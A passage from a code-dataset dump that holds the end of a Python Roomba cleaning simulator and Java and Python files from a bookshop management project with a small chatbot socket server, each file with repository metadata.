rotate_polygon(cleaned_triangle_1,\n self.direction+initial_step)\n cleaned_triangle_2 = rotate_polygon(cleaned_triangle_2,\n self.direction+initial_step)\n\n cleaned_triangle_1 = transpose_polygon(cleaned_triangle_1,self.loc)\n cleaned_triangle_2 = transpose_polygon(cleaned_triangle_2,self.loc)\n self.room.clean_polygon(cleaned_triangle_1)\n self.room.clean_polygon(cleaned_triangle_2)\n\n def turn(self, relative_direction):\n step = 1\n if relative_direction < 0:\n step = -1\n target_step = abs(int(relative_direction/self.TURN_STEP_FOR_DRAWING))\n for turn_step in range(0,target_step+1):\n self.clean_step(step*turn_step*self.TURN_STEP_FOR_DRAWING,\n step*self.TURN_STEP_FOR_DRAWING)\n\n self.clean_step(step*target_step*self.TURN_STEP_FOR_DRAWING,\n relative_direction - step*target_step*self.TURN_STEP_FOR_DRAWING)\n self.direction += relative_direction\n\n def step(self):\n raise Exception(\"Pure virtual function called\")\n\n def get_draw_info(self):\n return ([int(x) for x in self.loc],self.direction,self.trace)\n"
},
{
"alpha_fraction": 0.47864624857902527,
"alphanum_fraction": 0.577759861946106,
"avg_line_length": 28.547618865966797,
"blob_id": "8eb4b74840d74a9594bc28daac1f398f245eb115",
"content_id": "c2502d82e21c71f9b9d0d22d0065fb1277a16cb5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1241,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 42,
"path": "/controller.py",
"repo_name": "shacharr/roomba_sim",
"src_encoding": "UTF-8",
"text": "import matplotlib.pyplot\n\nfrom simulator import run_simulation\n\nfrom helper_functions import *\n\n#ROOM_POLYGON = [(0,0),(640,0),(640,480),(0,480)]\n#ROOM_POLYGON = [(0,0),(640,0),(640,480),(320,480),(320,240),(0,240)]\nROOM_POLYGON = [(0,0),(640,0),(640,480),(320,480),(250,240),(0,240)]\n\nSMALL_SQUARE = [(0,0),(10,0),(10,10),(0,10)]\n\nOBSTECLES = [transpose_polygon(SMALL_SQUARE,(200,45)),\n transpose_polygon(SMALL_SQUARE,(270,45)),\n transpose_polygon(SMALL_SQUARE,(200,125)),\n transpose_polygon(SMALL_SQUARE,(270,125)),]\n\nROOMBA_SIZE = 20\n\nMIN_COVERAGE_TO_EXIT = 0.988\nMAX_NO_GAIN_STEPS = 3000\n\n\ndef main():\n\n robot_params = {\"ROBOT_SIZE\":ROOMBA_SIZE,\n \"HEAD_SIZE\":1.9,\n \"SPEED\":3}\n room_params = {\"ROOM_POLYGON\":ROOM_POLYGON,\n \"OBSTECLES\":OBSTECLES}\n stop_conditions = {\"MIN_COVERAGE_TO_EXIT\":MIN_COVERAGE_TO_EXIT,\n \"MAX_NO_GAIN_STEPS\":MAX_NO_GAIN_STEPS,\n \"MAX_TIME\":9000}\n\n stats = run_simulation(robot_params, room_params,\n stop_conditions, visual_feedback=True)\n\n matplotlib.pyplot.plot(stats)\n matplotlib.pyplot.show()\n\nif __name__ == \"__main__\":\n main()\n"
},
{
"alpha_fraction": 0.5747562050819397,
"alphanum_fraction": 0.5969663858413696,
"avg_line_length": 28.774192810058594,
"blob_id": "a2012c2bee2a04dca2b20abce5ec70266315cbc2",
"content_id": "dc79083b0ec0b6ebb9c04f6093ff209d56df66b8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1846,
"license_type": "no_license",
"max_line_length": 109,
"num_lines": 62,
"path": "/helper_functions.py",
"repo_name": "shacharr/roomba_sim",
"src_encoding": "UTF-8",
"text": "import math\n\nclass Point(object):\n def __init__(self,coords):\n self.x = coords[0]\n self.y = coords[1]\n\n def delta(self,other):\n return Point([self.x-other.x,self.y-other.y])\n\n def dot(self,other):\n return self.x*other.x + self.y*other.y\n\ndef rotate(coords, direction):\n # from https://www.siggraph.org/education/materials/HyperGraph/modeling/mod_tran/2drota.htm\n x,y = coords\n cos_d = math.cos(direction)\n sin_d = math.sin(direction)\n return (x*cos_d - y*sin_d,\n y*cos_d + x*sin_d)\n\n\ndef line_circle_intersect(line_details, circle_details):\n # Based upon http://stackoverflow.com/questions/1073336/circle-line-segment-collision-detection-algorithm\n E = line_details[0]\n L = line_details[1]\n C = circle_details[0]\n r = circle_details[1]\n d = L.delta(E)\n f = E.delta(C)\n a = d.dot(d)\n b = 2*f.dot(d)\n c = f.dot(f) - r*r\n discriminant = b*b-4*a*c\n if discriminant < 0:\n return False\n discriminant = math.sqrt(discriminant)\n t1 = (-b - discriminant)/(2*a)\n t2 = (-b + discriminant)/(2*a)\n t1_good = t1 >= 0 and t1 <= 1\n t2_good = t2 >= 0 and t2 <= 1\n return t1_good or t2_good\n\ndef rotate_polygon(poly,direction):\n return [rotate(p,direction) for p in poly]\n\n\ndef transpose_polygon(poly,delta_coords):\n return [[x+y for x,y in zip(p,delta_coords)] for p in poly]\n\ndef polygon_bbox(poly):\n return [min(x[0] for x in poly),\n min(x[1] for x in poly),\n max(x[0] for x in poly),\n max(x[1] for x in poly)]\n\ndef is_circle_coliding_with_poligon(polygon, center, radius):\n for line in zip(polygon,polygon[1:]+[polygon[0]]):\n if line_circle_intersect([Point(line[0]),Point(line[1])],\n [Point(center), radius]):\n return True\n return False\n"
},
{
"alpha_fraction": 0.4974747598171234,
"alphanum_fraction": 0.5398989915847778,
"avg_line_length": 31.459016799926758,
"blob_id": "032912ec451ce2eff8a10b9ae5765511ce842711",
"content_id": "b08bac270ca761adb838b4d2f8bd34fa1d5fd708",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1980,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 61,
"path": "/arena_view.py",
"repo_name": "shacharr/roomba_sim",
"src_encoding": "UTF-8",
"text": "import time\nimport pygame\nimport math\n\nfrom helper_functions import *\n\nclass ScreenView(object):\n WHITE = (255,255,255)\n BLACK = ( 0, 0, 0)\n BLUE = ( 0, 0,255)\n GREEN = ( 0,255, 0)\n RED = (255, 0, 0)\n\n ARROW_RELATIVE_COORDS = ((0,0.8),(0.4,0.5),(0.2,0.5),(0.2,-0.6),\n (-0.2,-0.6),(-0.2,0.5),(-0.4,0.5),(0,0.8))\n\n\n def __init__(self, roomba_size, screen_size):\n self.screen = pygame.display.set_mode(screen_size)\n self.roomba_size = roomba_size\n self.arrow_scaled_coords = tuple((tuple((y*roomba_size for y in x))\n for x in self.ARROW_RELATIVE_COORDS))\n\n def clear_screen(self,room_surface):\n pygame.display.flip()\n self.screen.fill(self.WHITE)\n self.screen.blit(room_surface,(0,0))\n\n def draw_roomba(self,mid_point, direction, trace):\n pygame.draw.circle(self.screen, self.RED,\n mid_point, self.roomba_size)\n\n rotated_arrow = tuple(rotate(coords, direction)\n for coords in self.arrow_scaled_coords)\n transposed_arrow = tuple((tuple((y1+y2 for (y1,y2) in zip(x,mid_point)))\n for x in rotated_arrow))\n pygame.draw.polygon(self.screen, self.BLACK,\n transposed_arrow)\n pygame.draw.aalines(self.screen, self.RED, False, trace)\n\ndef testView():\n pygame.init()\n clock = pygame.time.Clock()\n view = ScreenView(50)\n done = False\n for i in range(0,360*10):\n clock.tick(30)\n \n for event in pygame.event.get(): # User did something\n #print \"Got event\",event,\"type:\",event.type\n if event.type == pygame.QUIT: # If user clicked close\n done=True\n if done:\n break\n view.draw_roomba((100,100),i * math.pi / 180. )\n view.clear_screen()\n\n#time.sleep(10)\n\nif __name__ == \"__main__\":\n testView()\n"
}
] | 8 |
lyh-git/bookshop | https://github.com/lyh-git/bookshop | 602e6aaa57683f8bd497295d2a12744936210802 | 502adc6dd52a071399a29c38bf2ea7ebc2ec7179 | 44231ccf0dc7961101edf99be67d9eae1af6f355 | refs/heads/master | 2022-11-17T06:59:31.896101 | 2020-07-10T01:47:55 | 2020-07-10T01:47:55 | 277,790,181 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6368563771247864,
"alphanum_fraction": 0.6368563771247864,
"avg_line_length": 13.192307472229004,
"blob_id": "e8c5ff7d5b0454ae16773f4f176d1c0500d47e32",
"content_id": "f3d6d0f1d65e5947e3c4f776b50df1e104d823a2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 369,
"license_type": "no_license",
"max_line_length": 36,
"num_lines": 26,
"path": "/src/com/bookshop/dao/UserDao.java",
"repo_name": "lyh-git/bookshop",
"src_encoding": "UTF-8",
"text": "package com.bookshop.dao;\n\nimport java.util.List;\n\nimport com.bookshop.entity.User;\n\npublic interface UserDao {\n\n // insert\n int insert(User user);\n\n // delete\n int delete(Integer id);\n\n // update\n int update(User user);\n\n // queryAll\n List<User> queryAll();\n\n // queryById\n User queryById(Integer adminId);\n\n User login(User user);\n\n}\n"
},
{
"alpha_fraction": 0.5090439319610596,
"alphanum_fraction": 0.5348837375640869,
"avg_line_length": 34,
"blob_id": "5e77e1ba5882b0b90ca795947371579906347bc2",
"content_id": "72cd0e620ffa15519ace735b96a78bdd46cb0e29",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 391,
"license_type": "no_license",
"max_line_length": 112,
"num_lines": 11,
"path": "/charrobot/DEMO01/dataset.py",
"repo_name": "lyh-git/bookshop",
"src_encoding": "UTF-8",
"text": "\nwith open(r\"H:\\编程\\charrobot\\DEMO01\\data\\xiaohuangji50w_nofenci.conv\",\"r\",encoding=\"utf-8\",errors=\"ignore\") as f:\n lists=[]\n count=0\n line=f.readlines(500)\n for i in line:\n if i.strip(\"E\").strip(\"M\").strip()!=\"\":\n lists.append(i.strip(\"E\").strip(\"M\").strip(\"\\n\"))\n count=count+1\n else:\n print(lists,count)\n lists=[]\n\n"
},
{
"alpha_fraction": 0.6746724843978882,
"alphanum_fraction": 0.6746724843978882,
"avg_line_length": 19.81818199157715,
"blob_id": "30b4ccdeee72559265797456507beb35f1e7c1ad",
"content_id": "fa67922f6b25bbc372a8d94c487a643b7d36792a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 916,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 44,
"path": "/src/com/bookshop/service/impl/AdminServiceImpl.java",
"repo_name": "lyh-git/bookshop",
"src_encoding": "UTF-8",
"text": "package com.bookshop.service.impl;\n\nimport java.util.List;\n\nimport com.bookshop.dao.AdminDao;\nimport com.bookshop.dao.impl.AdminDaoImpl;\nimport com.bookshop.entity.Admin;\nimport com.bookshop.service.AdminService;\n\npublic class AdminServiceImpl implements AdminService {\n\n AdminDao adminDao = new AdminDaoImpl();\n\n @Override\n public int insert(Admin admin) {\n return adminDao.insert(admin);\n }\n\n @Override\n public int delete(Integer adminId) {\n return adminDao.delete(adminId);\n }\n\n @Override\n public int update(Admin admin) {\n return adminDao.update(admin);\n }\n\n @Override\n public List<Admin> queryAll() {\n return adminDao.queryAll();\n }\n\n @Override\n public Admin queryById(Integer adminId) {\n return adminDao.queryById(adminId);\n }\n\n @Override\n public Admin login(Admin admin) {\n return adminDao.login(admin);\n }\n\n}\n"
},
{
"alpha_fraction": 0.6430317759513855,
"alphanum_fraction": 0.6430317759513855,
"avg_line_length": 14.148148536682129,
"blob_id": "59bbefcf54986e2189a8f217b7bb5d4bc174fad0",
"content_id": "b99a14a66e98ddb19b007a6a1d91a10bf8ab8fdf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 435,
"license_type": "no_license",
"max_line_length": 40,
"num_lines": 27,
"path": "/src/com/bookshop/service/BookService.java",
"repo_name": "lyh-git/bookshop",
"src_encoding": "UTF-8",
"text": "package com.bookshop.service;\n\nimport java.util.List;\n\nimport com.bookshop.entity.Book;\n\npublic interface BookService {\n\n // insert\n int insert(Book book);\n\n // delete\n int delete(Integer id);\n\n // update\n int update(Book book);\n\n // queryAll\n List<Book> queryAll();\n\n // queryById\n Book queryById(Integer id);\n\n // 根据书名查询书(支持模糊查询)\n List<Book> queryByName(String name);\n\n}\n"
},
{
"alpha_fraction": 0.5819373726844788,
"alphanum_fraction": 0.5819373726844788,
"avg_line_length": 19.492536544799805,
"blob_id": "1ca84888d421348dd94858cbb14ecbeb87655a61",
"content_id": "95eff33e8025ba1758ec0afbd5fb1008e6b70d35",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 1373,
"license_type": "no_license",
"max_line_length": 107,
"num_lines": 67,
"path": "/src/com/bookshop/entity/OrderItem.java",
"repo_name": "lyh-git/bookshop",
"src_encoding": "UTF-8",
"text": "package com.bookshop.entity;\n\npublic class OrderItem {\n private Integer id;\n private Integer userId;\n private Integer bookId;\n private Integer orderId;\n private Double priceSum;\n\n public OrderItem(Integer userId, Integer bookId, Integer orderId, Double priceSum) {\n this.userId = userId;\n this.bookId = bookId;\n this.orderId = orderId;\n this.priceSum = priceSum;\n }\n\n public OrderItem() {\n\n }\n\n public Integer getId() {\n return id;\n }\n\n public void setId(Integer id) {\n this.id = id;\n }\n\n public Integer getUserId() {\n return userId;\n }\n\n public void setUserId(Integer userId) {\n this.userId = userId;\n }\n\n public Integer getBookId() {\n return bookId;\n }\n\n public void setBookId(Integer bookId) {\n this.bookId = bookId;\n }\n\n public Integer getOrderId() {\n return orderId;\n }\n\n public void setOrderId(Integer orderId) {\n this.orderId = orderId;\n }\n\n public Double getPriceSum() {\n return priceSum;\n }\n\n public void setPriceSum(Double priceSum) {\n this.priceSum = priceSum;\n }\n\n @Override\n public String toString() {\n return \"OrderItem [id=\" + id + \", userId=\" + userId + \", bookId=\" + bookId + \", orderId=\" + orderId\n + \", priceSum=\" + priceSum + \"]\";\n }\n\n}\n"
},
{
"alpha_fraction": 0.536821722984314,
"alphanum_fraction": 0.5626614689826965,
"avg_line_length": 24.393442153930664,
"blob_id": "673c39ab2a75469b8f72191962ca3bf34de92be6",
"content_id": "9ca4fe5d6fef028797c4a21c35258a617c3e8084",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 1548,
"license_type": "no_license",
"max_line_length": 96,
"num_lines": 61,
"path": "/src/com/bookshop/util/JRichTextField.java",
"repo_name": "lyh-git/bookshop",
"src_encoding": "UTF-8",
"text": "package com.bookshop.util;\n\nimport java.awt.Color;\nimport java.awt.Font;\nimport java.awt.Graphics;\nimport java.awt.Graphics2D;\n\nimport javax.swing.JTextField;\n\npublic class JRichTextField extends JTextField {\n\n /**\n *\n */\n private static final long serialVersionUID = -1985791340012812141L;\n\n public JRichTextField() {\n\n }\n @Override\n public void paint(Graphics g) {\n super.paint(g);\n Graphics2D g2 = (Graphics2D)g;\n String text = getText();\n if((text == null || \"\".equals(text)) && !isFocusOwner()) {\n g2.setFont(new Font(getFont().getName(), Font.PLAIN, 12));\n g2.setColor(Color.GRAY);\n g2.drawString(getToolTipText(), 10, 22);\n }\n }\n\n class FlashThread extends Thread {\n\n private boolean focus = false;\n public FlashThread(boolean focus) { this.focus = focus; }\n\n @Override\n public void run() {\n for(int i = 0; i < 3; i++) {\n setBackground(Color.LIGHT_GRAY);\n try { Thread.sleep(100); } catch (InterruptedException e) {e.printStackTrace();}\n setBackground(null);\n try { Thread.sleep(100); } catch (InterruptedException e) {e.printStackTrace();}\n }\n\n if(focus) {\n setFocusable(true);\n requestFocus();\n }\n }\n }\n\n public void flash() {\n new FlashThread(false).start();\n }\n\n public void requestFocusAfterFlash() {\n new FlashThread(true).start();\n }\n\n}"
},
{
"alpha_fraction": 0.6000000238418579,
"alphanum_fraction": 0.6037036776542664,
"avg_line_length": 21.88135528564453,
"blob_id": "2ea7917005e076bb1a59ce93c09c6c424c7fea31",
"content_id": "7290efb465ba1d005543ef80bc71ade9878db305",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 1350,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 59,
"path": "/src/com/bookshop/service/impl/CartServiceImpl.java",
"repo_name": "lyh-git/bookshop",
"src_encoding": "UTF-8",
"text": "package com.bookshop.service.impl;\n\nimport java.util.List;\n\nimport com.bookshop.dao.CartDao;\nimport com.bookshop.dao.impl.CartDaoImpl;\nimport com.bookshop.entity.Cart;\nimport com.bookshop.service.CartService;\n\npublic class CartServiceImpl implements CartService {\n CartDao cartDao = new CartDaoImpl();\n\n @Override\n public int insert(Cart cart) {\n Cart cart2 = cartDao.query(cart.getUserId(), cart.getBookId());\n int result;\n if (cart2 == null) {\n result = cartDao.insert(cart);\n } else {\n cart2.setBookNum(cart.getBookNum() + cart2.getBookNum());\n result = cartDao.update(cart2);\n }\n return result;\n }\n\n @Override\n public int delete(Integer id) {\n \n return cartDao.delete(id);\n }\n\n @Override\n public int update(Cart cart) {\n \n return cartDao.update(cart);\n }\n\n @Override\n public List<Cart> queryAll() {\n \n return cartDao.queryAll();\n }\n\n @Override\n public List<Cart> queryAllByUserId(Integer userId) {\n return cartDao.queryAllByUserId(userId);\n }\n\n @Override\n public void clearCart(Integer userId) {\n List<Cart> carts = cartDao.queryAllByUserId(userId);\n for (Cart cart : carts) {\n cartDao.delete(cart.getId());\n\n }\n \n }\n\n}\n"
},
{
"alpha_fraction": 0.7395263910293579,
"alphanum_fraction": 0.7395263910293579,
"avg_line_length": 22.869565963745117,
"blob_id": "c6c38eb6c5d954e819b824ce094ce8c7a2396e83",
"content_id": "0a74351a4a8b2a7ed8281364e4152d62bf9c578f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 549,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 23,
"path": "/src/com/bookshop/service/impl/BookListServiceImpl.java",
"repo_name": "lyh-git/bookshop",
"src_encoding": "UTF-8",
"text": "package com.bookshop.service.impl;\n\nimport com.bookshop.dao.BookListDao;\nimport com.bookshop.dao.impl.BookListImpl;\nimport com.bookshop.entity.BookList;\nimport com.bookshop.service.BookListService;\n\nimport java.util.List;\n\npublic class BookListServiceImpl implements BookListService {\n BookListImpl bookList = new BookListImpl();\n\n @Override\n public List<BookList> queryAll() {\n\n return bookList.queryAll();\n }\n\n @Override\n public List<BookList> queryByName(String name) {\n return bookList.queryByName(name);\n }\n}\n"
},
{
"alpha_fraction": 0.7206704020500183,
"alphanum_fraction": 0.7821229100227356,
"avg_line_length": 44,
"blob_id": "6a97f18324a4f700fd3640ee5d943f218d443a18",
"content_id": "b63fa45e5a2e3ba6f558678418670ae7b3f78abe",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "INI",
"length_bytes": 179,
"license_type": "no_license",
"max_line_length": 98,
"num_lines": 4,
"path": "/src/app.properties",
"repo_name": "lyh-git/bookshop",
"src_encoding": "UTF-8",
"text": "STD_DRIVER = com.mysql.jdbc.Driver\nSTD_URL = jdbc:mysql://127.0.0.1:3306/bookshop?useSSL=false&useUnicode=true&characterEncoding=utf8\nSTD_USERNAME = root\nSTD_PASSWORD = root"
},
{
"alpha_fraction": 0.49056604504585266,
"alphanum_fraction": 0.5079444050788879,
"avg_line_length": 23.839506149291992,
"blob_id": "74d748e9c76b2c7094e3ab5eb263fd9b773ad01a",
"content_id": "956dc6987fc4248296afbce3f46c5325da233c4c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2324,
"license_type": "no_license",
"max_line_length": 87,
"num_lines": 81,
"path": "/charrobot/DEMO01/CS1/server.py",
"repo_name": "lyh-git/bookshop",
"src_encoding": "UTF-8",
"text": "import socket # 导入 socket 模块\nimport threading\nfrom threading import Thread\nimport saying\nimport requests\nimport tel\nimport sub\nADDRESS = ('127.0.0.1', 8715) # 绑定地址\n\ng_socket_server = None # 负责监听的socket\n\ng_conn_pool = [] # 连接池\n\n\ndef init():\n # \"\"\"\n # 初始化服务端\n # \"\"\"\n global g_socket_server\n g_socket_server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # 创建 socket 对象\n g_socket_server.bind(ADDRESS)\n g_socket_server.listen(5) # 最大等待数(有很多人理解为最大连接数,其实是错误的)\n print(\"服务端已启动,等待客户端连接...\")\n\n\ndef accept_client():\n # \"\"\"\n # 接收新连接\n # \"\"\"\n while True:\n client, addr = g_socket_server.accept() # 阻塞,等待客户端连接\n # 加入连接池\n g_conn_pool.append(client)\n # 给每个客户端创建一个独立的线程进行管理\n thread = Thread(target=message_handle, args=(client,addr))\n # 设置成守护线程\n thread.setDaemon(True)\n thread.start()\n\n\ndef message_handle(client,addr):\n # \"\"\"\n # 消息处理\n # \"\"\"\n\n while True:\n bytes = client.recv(1024)\n print(str(addr)+\"客户端请求数据:\", bytes.decode(encoding='utf8'))\n res = \"\".join(bytes.decode(encoding='utf8')).split(\"===\")\n # print(res[0],res[1])\n if len(bytes) == 0:\n client.close()\n # 删除连接\n g_conn_pool.remove(client)\n print(str(addr)+\"客户端下线了。\")\n break\n if res[0] == '2':\n print(\"--------------------------\")\n msg = sub.fc(res[1])\n client.sendall(msg.encode(encoding='utf8'))\n if res[0][-1] == '3':\n print(\"--------------------------\")\n msg = saying.say(res[1])\n client.sendall(msg.encode(encoding='utf8'))\n if res[0] == '1':\n print(\"--------------------------\")\n msg = \"情感分析功能尚未开放\"\n client.sendall(msg.encode(encoding='utf8'))\n\n\ndef main():\n #多线程同时运行两个方法\n t1 = threading.Thread(target=accept_client)\n t1.start()\n t1.join()\n\n\n\nif __name__ == '__main__':\n init()\n main()\n\n\n"
},
{
"alpha_fraction": 0.5268735885620117,
"alphanum_fraction": 0.55185467004776,
"avg_line_length": 33.375465393066406,
"blob_id": "7b651459c8b34389b8bffa34b0b204c7d6bc7aa7",
"content_id": "298983cc97c83a44dc0104b4d5763f192856624c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 9627,
"license_type": "no_license",
"max_line_length": 96,
"num_lines": 269,
"path": "/src/com/bookshop/ui/userForm/OrderItemForm.java",
"repo_name": "lyh-git/bookshop",
"src_encoding": "UTF-8",
"text": "/*\n * Created by JFormDesigner on Thu Jul 02 13:02:55 CST 2020\n */\n\npackage com.bookshop.ui.userForm;\n\nimport java.awt.event.*;\nimport com.bookshop.entity.Cart;\nimport com.bookshop.entity.Order;\nimport com.bookshop.entity.OrderItem;\nimport com.bookshop.entity.User;\nimport com.bookshop.service.impl.OrderItemServiceImpl;\nimport com.bookshop.service.impl.OrderServiceImpl;\nimport com.bookshop.util.UserData;\n\nimport java.awt.*;\nimport java.util.HashMap;\nimport java.util.List;\nimport javax.swing.*;\nimport javax.swing.table.*;\n\n/**\n * @author °Ëµã°ë\n */\npublic class OrderItemForm extends JFrame {\n private OrderServiceImpl orderService = new OrderServiceImpl();\n List<Order> orderItems;\n public HashMap<Integer,String> orderStatu=new HashMap<>();\n public HashMap<String,Integer> orderStatu2=new HashMap<>();\n//把数据展示到表格\n public void click() {\n\n table1.setModel(new DefaultTableModel(\n select(),\n new String[]{\n \"ID\", \"总价\", \"\\u7528\\u6237ID\", \"\\u8ba2\\u5355\\u72b6\\u6001\"\n }\n ) {\n\n @Override\n public boolean isCellEditable(int rowIndex, int columnIndex) {\n return false;\n }\n\n }\n\n );\n scrollPane1.setViewportView(table1);\n\n\n\n }\n//获取用户订单项数据\n private String[][] select() {\n// 根据不同用户选择展示数据\n if(\"user\".equals(UserData.Sign)) {\n orderItems = orderService.queryByUserId(UserData.userId);\n }else {\n orderItems = orderService.queryAll();\n }\n String[][] datas = new String[ orderItems.size()][4];\n for (int i = 0; i < datas.length; i++) {\n if (orderItems.get(i).getStatus()==-1){\n UserData.arrayList.add(orderItems.get(i).getId());\n continue;\n }\n datas[i][0] = orderItems.get(i).getId().toString();\n datas[i][1] = orderItems.get(i).getPriceSum().toString();\n datas[i][2] = orderItems.get(i).getUserId().toString();\n datas[i][3] = orderStatu.get(orderItems.get(i).getStatus());\n\n\n }\n //---- table1 ---\n return datas;\n }\n public OrderItemForm() {\n// 初始化订单状态\n orderStatu.put(-1,\"删除\");\n orderStatu.put(1,\"未付款\");\n orderStatu.put(2,\"已付款\");\n orderStatu2.put(\"删除\",-1);\n orderStatu2.put(\"未付款\",1);\n orderStatu2.put(\"已付款\",2);\n initComponents();\n click();\n }\n\n private void button1ActionPerformed(ActionEvent e) {\n // TODO add your code here\n OrderItemsForm orderItemsForm = new OrderItemsForm();\n orderItemsForm.setVisible(true);\n\n }\n\n private void button1MouseClicked(MouseEvent e) {\n // TODO add your code here\n }\n\n private void button2ActionPerformed(ActionEvent e) {\n // TODO add your code here\n click();\n }\n\n private void button3ActionPerformed(ActionEvent e) {\n // TODO add your code here\n// 删除\n // 注销用户,体现在statu的修改\n int id,userId,status;\n double priceSum;\n int index = table1.getSelectedRow();\n TableModel model = table1.getModel();\n // 如果下标不为-1,则选中行为数据行\n if (index != -1) {\n id = Integer.parseInt(model.getValueAt(index, 0).toString());\n userId = Integer.parseInt(model.getValueAt(index, 2).toString());\n priceSum = Double.parseDouble(model.getValueAt(index, 1).toString());\n status=-1;\n// JOptionPane.showMessageDialog(null, \"提示:有选项没填,已经设置为默认值\");\n\n// \"ID\", \"登录名\", \"密码\", \"昵称\", \"性别\", \"邮箱\", \"电话\", \"地址\"\n Order order = new Order(id,userId,priceSum,status);\n if (orderService.update(order) > 0) {\n JOptionPane.showMessageDialog(null, \"提示:注销成功!\");\n click();\n } else {\n JOptionPane.showMessageDialog(null, \"提示:注销失败!\");\n }\n } else {\n JOptionPane.showMessageDialog(null, \"提示:请选择需要注销的订单!\");\n }\n }\n\n private void table1MouseClicked(MouseEvent e) {\n // TODO add your code here\n// 点击表格判定订单是否付款\n// 未付款跳转到付款界面\n if(e.getClickCount()==2){\n int row = ((JTable)e.getSource()).rowAtPoint(e.getPoint());\n int index=table1.getSelectedRow();\n if (row == index){\n TableModel model = table1.getModel();\n // 如果下标不为-1,则选中行为数据行\n if (index != -1) {\n int id = Integer.parseInt(model.getValueAt(index, 0).toString());\n int statu = orderStatu2.get((model.getValueAt(index, 3).toString()));\n UserData.lastId=id;\n if(statu==2){\n JOptionPane.showMessageDialog(null, \"提示:订单已付款\");\n }else {\n PayForm payForm = new PayForm();\n payForm.setVisible(true);\n }\n\n\n }\n }\n }\n }\n\n\n\n private void initComponents() {\n\n\n // JFormDesigner - Component initialization - DO NOT MODIFY //GEN-BEGIN:initComponents\n label1 = new JLabel();\n scrollPane1 = new JScrollPane();\n table1 = new JTable();\n button1 = new JButton();\n button2 = new JButton();\n button3 = new JButton();\n\n //======== this ========\n Container contentPane = getContentPane();\n contentPane.setLayout(null);\n\n //---- label1 ----\n label1.setText(\"\\u8ba2\\u5355\\u9875\\u9762\");\n label1.setFont(label1.getFont().deriveFont(label1.getFont().getSize() + 16f));\n contentPane.add(label1);\n label1.setBounds(new Rectangle(new Point(245, 25), label1.getPreferredSize()));\n\n //======== scrollPane1 ========\n {\n\n //---- table1 ----\n table1.setModel(new DefaultTableModel(\n new Object[][] {\n {null, null, null, null},\n {null, null, null, null},\n {null, null, null, null},\n {null, null, null, null},\n {null, null, null, null},\n {null, null, null, null},\n {null, null, null, null},\n {null, null, null, null},\n {null, null, null, null},\n },\n new String[] {\n \"ID\", \"\\u8ba2\\u5355ID\", \"\\u7528\\u6237ID\", \"\\u8ba2\\u5355\\u72b6\\u6001\"\n }\n ) {\n boolean[] columnEditable = new boolean[] {\n false, false, false, false\n };\n @Override\n public boolean isCellEditable(int rowIndex, int columnIndex) {\n return columnEditable[columnIndex];\n }\n });\n table1.setCellSelectionEnabled(true);\n table1.addMouseListener(new MouseAdapter() {\n @Override\n public void mouseClicked(MouseEvent e) {\n table1MouseClicked(e);\n }\n });\n scrollPane1.setViewportView(table1);\n }\n contentPane.add(scrollPane1);\n scrollPane1.setBounds(60, 95, 550, 275);\n\n //---- button1 ----\n button1.setText(\"\\u8be6\\u7ec6\\u8ba2\\u5355\\u4fe1\\u606f\");\n button1.addActionListener(e -> button1ActionPerformed(e));\n contentPane.add(button1);\n button1.setBounds(new Rectangle(new Point(465, 50), button1.getPreferredSize()));\n\n //---- button2 ----\n button2.setText(\"\\u5237\\u65b0\");\n button2.addActionListener(e -> button2ActionPerformed(e));\n contentPane.add(button2);\n button2.setBounds(new Rectangle(new Point(60, 50), button2.getPreferredSize()));\n\n //---- button3 ----\n button3.setText(\"\\u5220\\u9664\");\n button3.addActionListener(e -> button3ActionPerformed(e));\n contentPane.add(button3);\n button3.setBounds(new Rectangle(new Point(75, 390), button3.getPreferredSize()));\n\n { // compute preferred size\n Dimension preferredSize = new Dimension();\n for(int i = 0; i < contentPane.getComponentCount(); i++) {\n Rectangle bounds = contentPane.getComponent(i).getBounds();\n preferredSize.width = Math.max(bounds.x + bounds.width, preferredSize.width);\n preferredSize.height = Math.max(bounds.y + bounds.height, preferredSize.height);\n }\n Insets insets = contentPane.getInsets();\n preferredSize.width += insets.right;\n preferredSize.height += insets.bottom;\n contentPane.setMinimumSize(preferredSize);\n contentPane.setPreferredSize(preferredSize);\n }\n pack();\n setLocationRelativeTo(getOwner());\n // JFormDesigner - End of component initialization //GEN-END:initComponents\n click();\n }\n\n // JFormDesigner - Variables declaration - DO NOT MODIFY //GEN-BEGIN:variables\n private JLabel label1;\n private JScrollPane scrollPane1;\n private JTable table1;\n private JButton button1;\n private JButton button2;\n private JButton button3;\n // JFormDesigner - End of variables declaration //GEN-END:variables\n}\n"
},
{
"alpha_fraction": 0.6166521906852722,
"alphanum_fraction": 0.6287944316864014,
"avg_line_length": 31.94285774230957,
"blob_id": "a0d88f5d8d4faf5114298c70a77362617ba966a0",
"content_id": "a98d141c041634f4f133695f999dc3bed2bfd3ab",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1401,
"license_type": "no_license",
"max_line_length": 99,
"num_lines": 35,
